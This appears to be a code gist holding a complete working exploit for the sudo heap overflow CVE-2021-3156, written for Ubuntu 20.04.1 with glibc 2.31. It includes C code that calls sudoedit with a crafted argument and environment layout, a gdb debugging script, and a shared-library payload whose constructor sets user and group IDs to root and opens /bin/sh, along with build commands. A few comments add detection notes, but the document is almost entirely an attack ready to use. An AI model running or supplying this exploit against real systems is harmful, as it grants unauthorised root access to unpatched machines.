
@WinMin
Last active August 9, 2021 02:44
CVE-2021-3156-exploit
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
/*
author: swing @ bestswngs@gmail.com
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue
Ubuntu 20.04.1 LTS \n \l
*/
/* Token-repetition helpers used to build the long envp initializer in main().
 * REPn(X) expands to n copies of "X," (REP0 expands to nothing); the trailing
 * comma on every copy is what lets an expansion sit directly between other
 * elements of a brace-enclosed initializer list. */
#define REP0(X)
#define REP1(X) X,
#define REP2(X) REP1(X) X,
#define REP3(X) REP2(X) X,
#define REP4(X) REP3(X) X,
#define REP5(X) REP4(X) X,
#define REP6(X) REP5(X) X,
#define REP7(X) REP6(X) X,
#define REP8(X) REP7(X) X,
#define REP9(X) REP8(X) X,
#define REP10(X) REP9(X) X,
/* 100 copies: ten REP10 expansions. */
#define REP100(X) \
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) \
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X)
/* 1000 copies: ten REP100 expansions. */
#define REP1000(X) \
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) \
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X)
/*
 * Trigger for CVE-2021-3156: builds an argv/envp pair and execve()s
 * /usr/bin/sudoedit with it.  The function does nothing else -- on success
 * the process image is replaced and main() never returns.
 *
 * Defender notes: the input shape is fully visible here -- sudoedit invoked
 * with "-s", an argument whose last byte is an unescaped backslash, and an
 * environment of well over a thousand entries most of which are the bare
 * string "\\" with no '=' in them.  Command-line/process auditing of sudoedit
 * invocations with "-s" and a trailing-backslash argument, and sudo's own
 * logging, are where a run of this shows up; patched sudo releases reject
 * the input.  Every layout constant below is tuned to the environment noted
 * in the file header (Ubuntu 20.04.1, glibc 2.31) -- do not expect the values
 * to transfer.
 */
int main(){
/* First sudoedit argument: 0x190 bytes of 'B' (a C99 VLA), with the last two
 * bytes overwritten so the string ends in a single unescaped backslash. */
int obufsz = 0x190;
char obuf[obufsz];
memset(obuf, 'B', sizeof(obuf));
obuf[obufsz-2] = 0x5c;   /* 0x5c == '\\' */
obuf[obufsz-1] = 0x00;   /* NUL terminator */
/* Last "real" environment entry: "LC_ALL=C.UTF-8@" followed by env_val, which
 * is 8 'Q' bytes plus (0xd0 - 8) 'A' bytes, NUL-terminated at index 0xd0.
 * Both buffers are 0x1000 bytes, so the sprintf() below cannot overflow. */
char env_cont[0x1000];
char env_val[0x1000];
int env_valsz = 0xd0;
memset(env_val,'Q',8);
memset(env_val+8,'A',env_valsz-8);
env_val[env_valsz] = '\0';
sprintf(env_cont,"LC_ALL=C.UTF-8@%s",env_val);
/* argv for execve(): sudoedit -s <obuf> "\" */
char *args[] = {
"/usr/bin/sudoedit",
"-s",
obuf,
"\\",
NULL
};
/* First envp entry: same shape as obuf but only 8 bytes -- 'C' padding ending
 * in "\" + NUL. */
int PAD1SZ = 8;
char pad1[PAD1SZ] ;
memset(pad1, 'C', sizeof(pad1));
pad1[PAD1SZ-2]= 0x5c;   /* 0x5c == '\\' */
pad1[PAD1SZ-1]= 0x00;
/* envp for execve().  The REPn() macros expand to that many "\\" entries
 * each: 1000 before "AAA\", then 100 + 5*10 + 7 = 157 after it, followed by
 * "X/X\", "a", the LC_ALL entry built above and the terminating NULL. */
char *extra_args[] = {
pad1,
REP1000("\\")
"AAA\\",
REP100("\\")
REP10("\\")
REP10("\\")
REP10("\\")
REP10("\\")
REP10("\\")
REP7("\\")
"X/X\\",
"a",
env_cont,
NULL,
};
/* execve() only returns on failure; that return value is not checked, so on
 * failure main() simply falls off the end (exit status 0 under C99+). */
execve(args[0], args, extra_args);
// execvpe("./sudoedit", args, extra_args);
}
# gcc CVE-2021-3156-exploit.c -o exploit
# gdb ./exploit -x gdbscript
#
# gdb command script for the trigger binary above.  It stops at the execve()
# into sudoedit and follows the new image ("catch exec" + follow-exec-mode
# new; "set breakpoint pending on" lets breakpoints on symbols that only exist
# in the new image be accepted), then breaks on free() only when the two
# register conditions hold, and unconditionally on __libc_dlopen_mode.
catch exec
set breakpoint pending on
set follow-exec-mode new
r
b free if $r15==0xc && $r8==0
b __libc_dlopen_mode
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
mkdir libnss_X
gcc -Os -Wall -Wextra -fPIC -shared inject.c -o libnss_X/X.so.2
*/
/*
 * Second-stage payload, built as a shared object (see the comment above).
 * Marked as a GCC constructor, so it runs as soon as the library is mapped
 * into a process -- nothing in the host needs to call it.  It announces
 * itself on stdout, attempts to set all four uid/gid values to 0, and then
 * replaces the process with /bin/sh.
 *
 * Defender notes: the literal "[+] getroot!" on stdout and the exploited
 * process exec'ing /bin/sh as root are the observable artefacts of a
 * successful run.  The leading-underscore name _init is in the reserved
 * identifier space; it is file-static here, so it is not exported.
 */
static void __attribute__ ((constructor)) _init(void);
static void _init(void) {
printf("[+] getroot!\n");
/* Return values are not checked: if any of these fails, the execv() below
 * still runs with whatever ids the process holds at that point. */
setuid(0); seteuid(0); setgid(0); setegid(0);
static char *a_argv[] = { "sh", NULL };
/* NOTE(review): a_envp is never used -- execv() takes no envp argument, so
 * the shell inherits the calling process's environment unchanged. */
static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
execv("/bin/sh", a_argv);
}